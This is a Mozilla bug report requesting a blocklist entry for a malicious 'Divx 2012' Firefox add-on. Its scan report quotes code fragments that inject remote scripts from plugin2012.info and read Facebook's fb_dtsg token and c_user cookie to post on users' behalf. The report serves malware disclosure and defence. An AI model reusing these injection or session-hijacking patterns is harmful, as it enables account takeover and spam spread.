Closed Bug 758503 Opened 13 years ago Closed 13 years ago

Malicious "Divx 2012" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

Attachments

(1 file)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Steps to reproduce: Downloaded add-on from
Actual results: Report for http://pluginstall.info/2012.xpi
** Embedded and Remote Files ** install.rdf chrome.manifest content/script-compiler.js content/youtube.js http://pluginstall.info/video/script.js http://plugin2012.info/you.js http://plugin2012.info/viral1.js http://plugin2012.info/ultra.js http://plugin2012.info/ultra2.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul content/skin/icon.png content/prefman.js
** Embedded Metadata ** <em:name>Divx 2012 Plugins</em:name> <em:version>9.4.2</em:version> <em:targetApplication> <em:minVersion>2.0</em:minVersion> <em:maxVersion>10.*</em:maxVersion> </em:targetApplication> <em:creator>Your Tube</em:creator> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:description>videos plugins</em:description> <em:homepageURL>http://youtube3ee.com/</em:homepageURL> <em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL> ...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR0YC1g/Mo...
** Files Loaded ** <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s...
** Remote Javascript Loaded ** <Description about="urn:mozilla:install-manifest"> <Description> </Description> <em:description>videos plugins</em:description> </Description> ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://pluginstall.info/video/script.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://plugin2012.info/you.js"); function addScript(src) { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); var a = document.getElementsByTagName('script')[0]; addScript("http://plugin2012.info/viral1.js"); addScript("http://plugin2012.info/ultra.js"); addScript("http://plugin2012.info/ultra2.js"); var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... 
** Facebook Paths Accessed ** blogs[0] = 'http://www.facebook.com/bra.toch?'; blogs[1] = 'http://www.facebook.com/bra.toch?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { ** Facebook Data Accessed ** var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... 
user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://youtube3ee.com/</em:homepageURL> <em:updateURL>http://brownizzeee.info/test/update.rdf</em:updateURL> // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ change[i].src="http://faceredirects.blogspot.ca/?iframe"; ifra.src="http://faceredirects.blogspot.ca/?iframe" ...L='<iframe id="change" width="500" src="http://faceredirects.blogspot.ca/?iframe... blogs[0] = 'http://www.facebook.com/bra.toch?'; blogs[1] = 'http://www.facebook.com/bra.toch?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; addScript("http://plugin2012.info/viral1.js"); blogs[0] = 'http://dl.dropbox.com/u/81406642/a.html?'; blogs[1] = 'http://dl.dropbox.com/u/81406642/a.html?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... 
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl... ...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000... addScript("http://plugin2012.info/ultra.js"); blogs[0] = 'http://dl.dropbox.com/u/81406642/b.html?'; blogs[1] = 'http://dl.dropbox.com/u/81406642/b.html?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ... '<center><br><br><br><br><br><img src="http://i.imgur.com/4BDZc.gif" /><br />Pl... ...setTimeout('top.location=\'http://faceredirects.blogspot.ca/?security\';', 10000... addScript("http://plugin2012.info/ultra2.js"); s.setAttribute("src", "http://plugin2012.info/you.js"); s.setAttribute("src", "http://pluginstall.info/video/script.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper...
Expected results: The add-on should not read the user's Facebook session tokens and cookies, or post messages on the user's behalf without consent. The excerpts above show the loaded scripts reading `Env.fb_dtsg` (Facebook's anti-CSRF form token) and the `c_user` cookie, alongside POST requests to Facebook's comment and connect endpoints.
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
